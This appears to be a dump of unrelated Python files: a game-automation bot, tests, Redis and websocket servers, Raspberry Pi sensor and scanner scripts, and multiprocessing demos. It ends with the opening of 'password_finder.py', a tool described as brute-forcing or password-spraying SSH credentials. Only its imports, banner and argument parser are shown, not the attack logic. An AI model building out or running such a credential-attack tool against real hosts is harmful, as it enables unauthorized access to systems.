sim = 0.99
filter_coordinates = True if len(self.enemies_list) == 0 else False
if blacklist:
Logger.log_info('Blacklist: ' + str(blacklist))
if len(blacklist) > 2:
self.enemies_list.clear()
while not self.enemies_list:
if (boss and len(blacklist) > 4) or (not boss and len(blacklist) > 3) or sim < 0.97:
if self.swipe_counter > 3: self.swipe_counter = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
swipes.get(self.swipe_counter)()
sim += 0.005
self.swipe_counter += 1
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] - 3, x[1] - 27], Utils.find_all('enemy/fleet_level', sim - 0.025, useMask=True)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L1: " +str(l1))
l2 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_1_down', sim - 0.02)))
l2 = [x for x in l2 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L2: " +str(l2))
l3 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 90], Utils.find_all('enemy/fleet_2_down', sim - 0.02)))
l3 = [x for x in l3 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L3: " +str(l3))
l4 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 125], Utils.find_all('enemy/fleet_3_up', sim - 0.035)))
l4 = [x for x in l4 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L4: " +str(l4))
l5 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 100], Utils.find_all('enemy/fleet_3_down', sim - 0.035)))
l5 = [x for x in l5 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L5: " +str(l5))
l6 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_2_up', sim - 0.025)))
l6 = [x for x in l6 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L6: " +str(l6))
if self.config.combat['siren_elites']:
l7 = Utils.find_siren_elites()
l7 = [x for x in l7 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L7: " +str(l7))
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6 + l7
else:
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6
sim -= 0.005
if filter_coordinates:
self.enemies_list = Utils.filter_similar_coords(self.enemies_list)
return self.enemies_list
def get_mystery_nodes(self, blacklist=[], boss=False):
"""Method which returns a list of mystery nodes' coordinates.
"""
if len(blacklist) > 2:
self.mystery_nodes_list.clear()
if len(self.mystery_nodes_list) == 0 and not Utils.find('combat/question_mark', 0.9):
# if list is empty and a question mark is NOT found
return self.mystery_nodes_list
else:
# list has elements or list is empty but a question mark has been found
filter_coordinates = True if len(self.mystery_nodes_list) == 0 else False
sim = 0.95
while not self.mystery_nodes_list and sim > 0.93:
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1790), map(lambda x:[x[0], x[1] + 140], Utils.find_all('combat/question_mark', sim)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
self.mystery_nodes_list = l1
sim -= 0.005
if filter_coordinates:
self.mystery_nodes_list = Utils.filter_similar_coords(self.mystery_nodes_list)
return self.mystery_nodes_list
def filter_blacklist(self, coord, blacklist):
for y in blacklist:
if abs(coord[0] - y[0]) < 40 and abs(coord[1] - y[1]) < 40:
return True
return False
def get_fleet_location(self):
"""Method to get the fleet's current location. Note it uses the green
fleet marker to find the location but returns around the area of the
feet of the flagship
Returns:
array: An array containing the x and y coordinates of the fleet's
current location.
"""
if not self.fleet_location:
coords = [0, 0]
count = 0
while coords == [0, 0]:
Utils.update_screen()
count += 1
if count > 4:
Utils.swipe(960, 540, 960, 540 + 150 + count * 20, 100)
Utils.update_screen()
if Utils.find('combat/fleet_ammo', 0.8):
coords = Utils.find('combat/fleet_ammo', 0.8)
coords = [coords.x + 140, coords.y + 225 - count * 20]
elif Utils.find('combat/fleet_arrow', 0.9):
coords = Utils.find('combat/fleet_arrow', 0.9)
coords = [coords.x + 25, coords.y + 320 - count * 20]
if count > 4:
Utils.swipe(960, 540 + 150 + count * 20, 960, 540, 100)
elif (math.isclose(coords[0], 160, abs_tol=30) & math.isclose(coords[1], 142, abs_tol=30)):
coords = [0, 0]
self.fleet_location = coords
return self.fleet_location
def get_closest_target(self, blacklist=[], location=[], mystery_node=False, boss=False):
"""Method to get the enemy closest to the specified location. Note
this will not always be the enemy that is actually closest due to the
asset used to find enemies and when enemies are obstructed by terrain
or the second fleet
Args:
blacklist(array, optional): Defaults to []. An array of
coordinates to exclude when searching for the closest enemy
location(array, optional): Defaults to []. An array of coordinates
to replace the fleet location.
Returns:
array: An array containing the x and y coordinates of the closest
enemy to the specified location
"""
fleet_location = self.get_fleet_location()
if location == []:
location = fleet_location
if mystery_node and self.chapter_map[0].isdigit():
mystery_nodes = self.get_mystery_nodes(blacklist, boss)
if self.config.combat['focus_on_mystery_nodes'] and len(mystery_nodes) > 0:
# giving mystery nodes top priority and ignoring enemies
targets = mystery_nodes
Logger.log_info("Prioritizing mystery nodes.")
else:
# mystery nodes are valid targets, same as enemies
enemies = self.get_enemies(blacklist, boss)
targets = enemies + mystery_nodes
else:
# target only enemy mobs
targets = self.get_enemies(blacklist, boss)
closest = targets[Utils.find_closest(targets, location)[1]]
Logger.log_info('Current location is: {}'.format(fleet_location))
Logger.log_info('Targets found at: {}'.format(targets))
Logger.log_info('Closest target is at {}'.format(closest))
if closest in self.enemies_list:
x = self.enemies_list.index(closest)
del self.enemies_list[x]
target_type = "enemy"
else:
x = self.mystery_nodes_list.index(closest)
del self.mystery_nodes_list[x]
target_type = "mystery_node"
return [closest[0], closest[1], target_type]
def check_movement_threads(self):
thread_list = []
# essential threads
thread_check_alert_info = Thread(
target=self.check_movement_threads_func, args=("menu/alert_info",))
thread_check_menu_formation = Thread(
target=self.check_movement_threads_func, args=("combat/menu_formation",))
thread_check_menu_loading = Thread(
target=self.check_movement_threads_func, args=("combat/menu_loading",))
thread_list.extend([thread_check_alert_info, thread_check_menu_formation, thread_check_menu_loading])
# threads needed for non-event maps (where mystery nodes appears)
if self.chapter_map[0].isdigit():
thread_check_alert_ammo = Thread(
target=self.check_movement_threads_func, args=("combat/alert_ammo_supplies",))
thread_check_item_found = Thread(
target=self.check_movement_threads_func, args=("menu/item_found",))
thread_list.extend([thread_check_alert_ammo, thread_check_item_found])
# threads needed for story maps without clearing mode enabled
if not self.config.combat['clearing_mode']:
thread_check_button_evade = Thread(
target=self.check_movement_threads_func, args=("combat/button_evade",))
thread_check_failed_evade = Thread(
target=self.check_movement_threads_func, args=("combat/alert_failed_evade",))
thread_list.extend([thread_check_button_evade, thread_check_failed_evade])
Utils.multithreader(thread_list)
return self.movement_event
def check_movement_threads_func(self, event):
self.movement_event[event] = (
True
if (Utils.find(event))
else False)
|
test_s3urlcache.py
|
#!/usr/bin/env python
# coding: utf-8
import logging
import os
import io
import shutil
import sys
import unittest
import threading
import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from requests import HTTPError
pkg_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) # noqa
sys.path.insert(0, pkg_root) # noqa
import dss
from dss import Config, BucketConfig
from dss.config import Replica
from dss.logging import configure_test_logging
from dss.util import networking
from dss.util.s3urlcache import S3UrlCache, SizeLimitError
from tests.infra import testmode
logger = logging.getLogger(__name__)
KiB = 1024
MB = KiB ** 2
randomdata = 'a random string of data'
class HTTPInfo:
address = "127.0.0.1"
port = None
server = None
thread = None
@classmethod
def make_url(cls):
cls.url = f"http://{cls.address}:{cls.port}"
def setUpModule():
configure_test_logging()
HTTPInfo.port = networking.unused_tcp_port()
HTTPInfo.server = HTTPServer((HTTPInfo.address, HTTPInfo.port), GetTestHandler)
HTTPInfo.make_url()
HTTPInfo.thread = threading.Thread(target=HTTPInfo.server.serve_forever)
HTTPInfo.thread.start()
global randomdata
randomdata = os.urandom(MB)
def tearDownModule():
HTTPInfo.server.shutdown()
@testmode.standalone
class TestS3UrlCache(unittest.TestCase):
@classmethod
def setUpClass(cls):
replica = Replica.aws
Config.set_config(BucketConfig.TEST_FIXTURE)
cls.blobstore = Config.get_blobstore_handle(replica)
cls.test_fixture_bucket = replica.bucket
Config.set_config(BucketConfig.TEST)
cls.test_bucket = replica.bucket
def setUp(self):
self.urls_to_cleanup = set()
self.cache = S3UrlCache()
def tearDown(self):
self._delete_cached_urls()
def test_store_in_cache(self):
"""The URL contents are stored in S3 and the contents returned, when requested url is not found in cache."""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
self._delete_cached_urls()
with self.assertLogs(dss.logger, "INFO") as log_monitor:
url_content = self.cache.resolve(url)
original_data = randomdata[:KiB]
self.assertEqual(len(url_content), KiB)
self.assertEqual(url_content, original_data)
self.assertTrue(log_monitor.output[0].endswith(f"{url} not found in cache. Adding it to "
f"{self.test_bucket} with key {url_key}."))
def test_retrieve_from_cache(self):
"""Stored URL contents is retrieved from S3, when a cached url is requested"""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
with self.assertLogs(dss.logger, 'INFO') as log_monitor:
url_content = self.cache.resolve(url)
cached_content = self.cache.resolve(url)
self.assertEqual(len(log_monitor.output), 1)
self.assertEqual(url_content, cached_content)
def test_bad_url(self):
bad_urls = ['', '//', 'http://?']
self.urls_to_cleanup.update(bad_urls)
for url in bad_urls:
with self.subTest(bad_url=url):
with self.assertRaises(requests.RequestException):
self.cache.resolve(url)
def test_url_SizeLimitError(self):
"""Exception returned when URL content size is greater than max_size."""
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
self.cache.max_size = 1
with self.assertRaises(SizeLimitError) as ex:
self.cache.resolve(url)
self.assertEqual(ex.exception.args[0], f"{url} not cached. The URL's contents have exceeded "
f"{self.cache.max_size} bytes.")
def test_content_size_0(self):
url = f"{HTTPInfo.url}/0"
self.urls_to_cleanup.add(url)
url_content = self.cache.resolve(url)
self.assertEqual(len(url_content), 0)
def test_chunked_content(self):
size = KiB * 10
url = f"{HTTPInfo.url}/{size}"
self.urls_to_cleanup.add(url)
self.cache.max_size = 1 * MB
self.cache.chunk_size = 1 * KiB
url_content = self.cache.resolve(url)
original_data = randomdata[:size]
self.assertEqual(url_content, original_data)
def test_stored_url_metadata(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
self.cache.resolve(url)
with self.subTest("check dss_cached_url"):
cached_url = self.cache._reverse_key_lookup(url_key)
self.assertEqual(cached_url, url)
with self.subTest("check content_type"):
contentType = self.blobstore.get_content_type(self.test_bucket, url_key)
self.assertEqual(contentType, "application/octet-stream")
def test_evict(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
url_key = S3UrlCache._url_to_key(url)
with self.assertLogs(dss.logger, "INFO") as log_monitor:
# Verify the URL is cached
self.cache.resolve(url)
self.assertTrue(self.cache.contains(url))
# Remove the URL from cache
self.cache.evict(url)
self.assertTrue(not self.cache.contains(url))
self.cache.evict(url)
self.assertTrue(not self.cache.contains(url))
self.assertTrue(log_monitor.output[0].endswith(f"{url} not found in cache. Adding it to "
f"{self.test_bucket} with key {url_key}."))
self.assertTrue(log_monitor.output[1].endswith(f"{url} removed from cache in {self.test_bucket}."))
self.assertTrue(log_monitor.output[2].endswith(f"{url} not found and not removed from cache."))
def test_contains(self):
url = f"{HTTPInfo.url}/{KiB}"
self.urls_to_cleanup.add(url)
self.assertTrue(not self.cache.contains(url))
self.cache.resolve(url)
self.assertTrue(self.cache.contains(url))
def test_request_fail(self):
"""URL is not cached when url does not return status code 200"""
url = f"{HTTPInfo.url}/abcd"
self.urls_to_cleanup.add(url)
with self.assertRaises(HTTPError) as ex:
self.cache.resolve(url)
self.assertEqual(ex.exception.args[0], f"404 Client Error: Not Found for url: {url}")
def _delete_cached_urls(self):
for url in self.urls_to_cleanup:
self.cache.evict(url)
class GetTestHandler(BaseHTTPRequestHandler):
def do_GET(self):
path = self.path.split('/')[1]
if path.isdigit():
self.generate_random(int(path))
else:
self.generate_error()
def generate_random(self, length):
self.send_response(200)
self.send_header("content-length", length)
self.end_headers()
if length:
shutil.copyfileobj(io.BytesIO(randomdata[:length]), self.wfile)
def generate_error(self):
self.send_response(404)
self.end_headers()
def log_request(self, code='-', size='-'):
if Config.debug_level():
super().log_request(code, size)
if __name__ == "__main__":
unittest.main()
|
RedisMonitor.py
|
import redis
import time
import math
class RedisMonitor:
"""
Monitor Redis keys and send updates to all web socket clients.
"""
def __init__(self, host="localhost", port=6379, password="", db=0, refresh_rate=0.5, key_filter="", realtime=False):
"""
If realtime is specified, RedisMonitor will enable notifications for all
set events and subscribe to these notifications.
"""
self.host = host
self.port = port
self.password = password
self.db = db
self.refresh_rate = refresh_rate
self.key_filter = key_filter
self.realtime = realtime
self.redis_db = redis.Redis(host=self.host, port=self.port, password=self.password, db=self.db, decode_responses=False)
self.message_last = {}
if self.realtime:
self.pubsub = self.redis_db.pubsub()
self.lock = threading.Lock()
self.message_buffer = []
# Need to perform the following command to enable keyevent notifications:
# config set notify-keyspace-events "$E"
notify_keyspace_events = self.redis_db.config_get("notify-keyspace-events")["notify-keyspace-events"]
if "$" not in notify_keyspace_events and "A" not in notify_keyspace_events:
# Add string commands to notifications
notify_keyspace_events += "$"
if "E" not in notify_keyspace_events:
# Add keyevent events to notifications
notify_keyspace_events += "E"
self.redis_db.config_set("notify-keyspace-events", notify_keyspace_events)
self.pubsub.psubscribe("__keyevent@%s__:set" % self.db)
def messenger(self, ws_server):
"""
When realtime is set, this thread sends messages to all web socket
clients every refresh_rate seconds.
"""
while True:
time.sleep(self.refresh_rate)
self.lock.acquire()
if not self.message_buffer:
self.lock.release()
continue
keyvals = self.message_buffer
self.message_buffer = []
self.lock.release()
ws_server.lock.acquire()
for client in ws_server.clients:
client.send(ws_server.encode_message(keyvals))
ws_server.lock.release()
def parse_val(self, key, skip_unchanged=True):
"""
Get the value from Redis and parse if it's an array.
If skip_unchanged = True, only returns values updated since the last call.
"""
import re
def isnumeric(s):
"""
Helper function to test if string is a number
"""
try:
float(s)
return True
except ValueError:
return False
if self.key_filter and re.match(self.key_filter, key) is None:
return
val = self.redis_db.get(key)
# Skip if the value hasn't changed
if skip_unchanged:
if key in self.message_last and val == self.message_last[key]:
return None
self.message_last[key] = val
try:
# If the first element is a number, try converting all the elements to numbers
val = val.decode("utf-8")
except:
# Otherwise, leave it as a string
pass
return val
def _initialize_redis_keys(self):
import json
interaction = {
"key_object": "",
"idx_link": 0,
"pos_click_in_link": [0,0,0],
"pos_mouse_in_world": [0,0,0],
"modifier_keys": [],
"key_down": ""
}
self.redis_db.set("webapp::simulator::interaction", json.dumps(interaction))
def run_forever(self, ws_server):
"""
Listen for redis keys (either realtime or every refresh_rate seconds)
and send updated values to all web socket clients every refresh_rate seconds.
"""
self._initialize_redis_keys()
if not self.realtime:
# Send messages to clients every refresh_rate seconds
prev_keys = set()
while True:
time.sleep(self.refresh_rate)
key_vals = []
new_keys = set()
keys = [key for key in self.redis_db.scan_iter()]
for key in keys:
if self.redis_db.type(key) != b"string":
continue
key = key.decode("utf-8")
if "high_res" in key:
continue
new_keys.add(key)
val = self.parse_val(key)
if val is None:
continue
key_vals.append((key, val))
del_keys = list(prev_keys - new_keys)
prev_keys = new_keys
if not key_vals and not del_keys:
continue
for key in del_keys:
self.message_last.pop(key, None)
ws_server.lock.acquire()
for client in ws_server.clients:
client.send(ws_server.encode_message({"update": key_vals, "delete": del_keys}))
ws_server.lock.release()
else:
# Create thread to send messages to client with refresh rate
messenger_thread = threading.Thread(target=self.messenger, args=(ws_server,))
messenger_thread.daemon = True
messenger_thread.start()
# Listen for redis notifications
for msg in self.pubsub.listen():
if msg["pattern"] is None:
continue
key = msg["data"]
val = self.parse_val(key)
if val is None:
continue
self.lock.acquire()
self.message_buffer.append((key, val))
self.lock.release()
def initialize_client(self, ws_server, client):
"""
On first connection, send client all Redis keys.
"""
key_vals = []
# TODO: Don't disrupt other clients
self.message_last = {}
for key in sorted(self.redis_db.scan_iter()):
if self.redis_db.type(key) != b"string":
continue
val = self.parse_val(key, skip_unchanged=False)
if val is None:
continue
key_vals.append((key.decode("utf-8"), val))
client.send(ws_server.encode_message({"update": key_vals, "delete": []}))
|
main.py
|
import asyncio
import json
import logging
from utils.driver import AnalogOutput
import websockets
import os
import threading
# Env
SERVER_PORT = os.getenv('SERVER_PORT', 6789)
SERVER_URL = os.getenv('SERVER_URL', "localhost")
# Setup logging
logging.basicConfig()
# Body response
CONNECTED_RESPONSE = {
"status": "ok",
"response": "Connection established"
}
driver = AnalogOutput(0)
stop = False
async def sendRealtimeInfo(ws):
while not stop:
response_body = {
'value': driver.getDeviceValue(),
'type': 'realtime_data'
}
await ws.send(json.dumps(response_body))
async def init_connection(websocket, path):
try:
global stop
await websocket.send(json.dumps(CONNECTED_RESPONSE))
async for message in websocket:
data = json.loads(message)
if data['option'] == 'getRealtimeInfo':
stop = False
_thread = threading.Thread(target=asyncio.run, args=(sendRealtimeInfo(websocket),))
_thread.start()
elif data['option'] == 'stopRealtimeInfo':
stop = True
print(data)
except:
print("Error starting server")
# Start server
start_server = websockets.serve(init_connection, SERVER_URL, SERVER_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
|
ultrasonic.py
|
import RPi.GPIO as GPIO
import time
import threading
import sys
class Ultrasonic:
def __init__(self):
#set GPIO Pins
self.GPIO_TRIGGER = 19
self.GPIO_ECHO = 26
#set GPIO direction (IN / OUT)
GPIO.setup(self.GPIO_TRIGGER , GPIO.OUT)
GPIO.setup(self.GPIO_ECHO, GPIO.IN)
self.measurement_interval = 0.2 # in seconds
self.current_distance = 0
self.stopped = False
def distance(self):
while self.stopped == False:
try:
time.sleep(self.measurement_interval)
# set Trigger to HIGH6
GPIO.output(self.GPIO_TRIGGER, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(self.GPIO_TRIGGER, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(self.GPIO_ECHO) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(self.GPIO_ECHO) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
self.current_distance = (TimeElapsed * 34300) / 2
#print("Measured Distance = %.1f cm" % self.current_distance)
#press ctrl+c for keyboard interrupt
except KeyboardInterrupt:
#check for exit
self.stop()
sys.exit(0)
def start(self):
t = threading.Thread(target=self.distance, args=())
t.daemon = True
t.start()
def stop(self):
self.stopped = True
GPIO.cleanup()
# Built upon: https://tutorials-raspberrypi.com/raspberry-pi-ultrasonic-sensor-hc-sr04/
|
scan2drive.py
|
#!/usr/bin/python3
import os
import RPi.GPIO as GPIO
from datetime import datetime, timedelta
import time
import subprocess
import threading
drivePathMartin = "gdrive:toOCR/"
drivePathMaddie = "gdrive:toOCR/Maddie/"
pinLight = 24
pinButton = 18
tempDir = "/home/pi/scan2drive/upload/"
scanFormat = "jpeg"
scanCommand = ("scanimage", "--format", scanFormat, "--resolution", "300")
scanFileName = "%Y-%m-%d_%H-%M-%S"
def error_blink(e):
print("error: " + str(e))
for x in range(8):
GPIO.output(pinLight, 0)
time.sleep(0.8)
GPIO.output(pinLight, 1)
time.sleep(0.8)
def scan_upload():
global drivePath
GPIO.output(pinLight, 1)
try:
timestamp = (datetime.now() + timedelta(hours=1)).strftime(scanFileName)
file = tempDir + timestamp + "." + scanFormat
print("Scan and upload " + file)
with open(file, 'w') as f:
subprocess.run(scanCommand, stdout=f, check=True)
print("Upload: " + tempDir + " to " + drivePath)
subprocess.run(("rclone", "move", tempDir, drivePath), check=True)
print("Successfully uploaded to " + drivePath)
GPIO.output(pinLight, 0)
except Exception as e:
error_blink(e)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(pinLight, GPIO.OUT)
GPIO.setup(pinButton, GPIO.IN, pull_up_down=GPIO.PUD_UP)
try:
print("ocrscan2drive by martinbreu")
subprocess.run(("mkdir", tempDir))
while True:
GPIO.wait_for_edge(pinButton, GPIO.RISING)
drivePath = drivePathMartin
thread = threading.Thread(target=scan_upload)
thread.start()
time.sleep(0.5)
while thread.is_alive():
if not GPIO.input(pinButton):
drivePath = drivePathMaddie
GPIO.output(pinLight, 0)
time.sleep(0.8)
GPIO.output(pinLight, 1)
time.sleep(0.8)
continue
except Exception as e:
error_blink(e)
GPIO.cleanup()
|
explorer.py
|
# -*- coding:utf-8 -*-
import pickle
import time
import zlib
from multiprocessing import Process
import zmq
from maddpg.common.env_wrappers import BatchedEnvironment
from maddpg.common.logger import logger
def increment(items, size):
for i in range(size):
items[i] += 1
def explore(args, id):
c = zmq.Context()
s = c.socket(zmq.REQ)
host = 'tcp://%s:%d' % (args.host, args.port)
s.connect(host)
logger.info('zmq socket addr: tcp://%s:%d' % (args.host, args.port))
batch_env = BatchedEnvironment(args, id)
obs = batch_env.reset()
action = batch_env.uniform_action()
i = 0
n = args.env_batch_size
episode = [0] * n
episode_step = [0] * n
while True:
next_obs, rew, done, info = batch_env.step(action)
i += n
increment(episode_step, n)
terminal = [episode_step[i] >= args.max_episode_len for i in range(n)]
sample = [obs, action, next_obs, rew, done, terminal]
p = pickle.dumps(sample)
z = zlib.compress(p)
while True:
try:
s.send_pyobj(z)
data = s.recv_pyobj()
action = pickle.loads(data)
break
except zmq.ZMQError:
logger.error("send to zmq server[%s] error, sleep 1s" % host)
time.sleep(1)
if str(action) == "stop":
logger.info("[%d],%d finished explore, learning server stoped" % (
id, i))
break
if i % (10 * args.save_rate) == 0:
logger.debug("batch_env[%d] step:%i, episode:%s" %
(id, i, str(episode)))
obs = batch_env.reset_if_done(done, terminal, episode_step, episode)
if i % 10000 == 0:
logger.debug(str(id) + ":" + str(episode))
def parallel_explore(args):
processes = []
for i in range(args.num_env):
p = Process(target=explore, args=(args, i))
p.start()
processes.append(p)
for p in processes:
p.join()
|
process_demo1.py
|
#导入Process类,os和time模块
from multiprocessing import Process
import os, time
#定义child_process()函数,输入参数:sec秒
def child_process(sec):
print("child_process_%d starts and sleep %d seconds" % (os.getpid(), sec))
time.sleep(sec)
print("child_process_%d ends" % (os.getpid()))
if __name__ == "__main__":
print("Parent Process %s starts" % (os.getpid()))
#实例化三个Process对象
p1 = Process(target=child_process, args=(3, ), name='NO.1')
p2 = Process(target=child_process, args=(2, ), name='NO.2')
p3 = Process(target=child_process, args=(1, ), name='NO.3')
print("Child Processes start")
#启动子进程
p1.start()
p2.start()
p3.start()
#查看子进程信息
print("p1:name=%s,pid=%d,is_alive=%s" % (p1.name,p1.pid,p1.is_alive()))
print("p2:name=%s,pid=%d,is_alive=%s" % (p2.name,p2.pid,p2.is_alive()))
print("p3:name=%s,pid=%d,is_alive=%s" % (p3.name,p3.pid,p3.is_alive()))
#等待子进程执行结束
p1.join()
p2.join()
p3.join()
#查看子进程信息
print("p1:name=%s,pid=%d,is_alive=%s" % (p1.name, p1.pid, p1.is_alive()))
print("p2:name=%s,pid=%d,is_alive=%s" % (p2.name, p2.pid, p2.is_alive()))
print("p3:name=%s,pid=%d,is_alive=%s" % (p3.name, p3.pid, p3.is_alive()))
print("Parent Process ends")
|
dynamic_batching_test.py
|
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading as td
import itertools
import time
import cortex_internal.lib.api.batching as batching
class Predictor:
def predict(self, payload):
time.sleep(0.2)
return payload
def test_dynamic_batching_while_hitting_max_batch_size():
max_batch_size = 32
dynamic_batcher = batching.DynamicBatcher(
Predictor(), max_batch_size=max_batch_size, batch_interval=0.1, test_mode=True
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.predict(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(128):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(60)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the max batch size
assert len(set(batch_lengths)) == 1
assert max_batch_size in batch_lengths
def test_dynamic_batching_while_hitting_max_interval():
max_batch_size = 32
dynamic_batcher = batching.DynamicBatcher(
Predictor(), max_batch_size=max_batch_size, batch_interval=1.0, test_mode=True
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.predict(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(2):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(30)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the number of running threads
assert len(set(batch_lengths)) == 1
assert len(running_threads) in batch_lengths
|
password_finder.py
|
#!/usr/bin/env python3 -tt
#-*- coding: UTF-8 -*-
"""
NAME: password_finder.py
VERSION: 1.0
AUTHOR: Jesse Leverett (CyberThulhu)
STATUS: Building Initial code framework
DESCRIPTION: Allows for a User to bruteforce/password spray SSH credentials
TO-DO:
[ ] Impliment Traditional Brute Force Methods
[ ] Impliment Single User, Single Password Mode
[ ] Impliment Multi User, Multi Password
COPYRIGHT © 2021 Jesse Leverett
"""
# Imports
import sys
import time
import socket
import argparse
import ipaddress
from threading import Thread
from datetime import datetime
try:
from colorama import init, Fore, Back, Style
init()
except ImportError:
print("[-] ERROR: 'colorama' is a required package to run this program")
sys.exit(1)
try:
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException
except ImportError:
print(Fore.RED + Back.YELLOW + "[-] ERROR: 'paramiko' is a required package to run this program." + Fore.RESET + Back.RESET)
sys.exit(1)
# Added Variables
__author__ = "Jesse Leverett"
__copyright__ = "Copyright (C) 2021 Jesse Leverett"
__license__ = "MIT License"
__version__ = "1.0"
def display_banner():
""" Displays Banner """
return ('''
_ __ _ _
| | / _(_) | |
_ __ __ _ ___ _____ _____ _ __ __| | | |_ _ _ __ __| | ___ _ __
| '_ \ / _` / __/ __\ \ /\ / / _ \| '__/ _` | | _| | '_ \ / _` |/ _ \ '__|
| |_) | (_| \__ \__ \\\\ V V / (_) | | | (_| | | | | | | | | (_| | __/ |
| .__/ \__,_|___/___/ \_/\_/ \___/|_| \__,_| |_| |_|_| |_|\__,_|\___|_|
| | ______
|_| |______|
''')
# Instantiate Argparser
PROG_DESCRIPTION = "Allows for a User to bruteforce/password spray SSH credentials"
PROG_EPILOG = f"{__copyright__}"
VERSION_HELP_TEXT = "Prints Version Information"
parser = argparse.ArgumentParser(prog="password_finder",
description = PROG_DESCRIPTION,
epilog = PROG_EPILOG,
formatter_class= argparse.RawDescriptionHelpFormatter)
parser.add_argument('--version', action="version",
version=f"PROG: %(prog)s \t VERSION: {__version__}", help=VERSION_HELP_TEXT)
# Instantiate SubParsers
sub_parser = parser.add_subparsers(description="Select the Mode to Use", dest="passw_finder_mode")
# Add SubParsers
brute_force_parser = sub_parser.add_parser("bf", help="Brute Forcing Mode")
passw_spray_parser = sub_parser.add_parser("ps", help="Password Spraying Mode")
# Shared Arguments
def add_parse_arguments(input_sub_parser=None) -> argparse.Namespace:
""" Shared Arguments for Sub-Parsers """
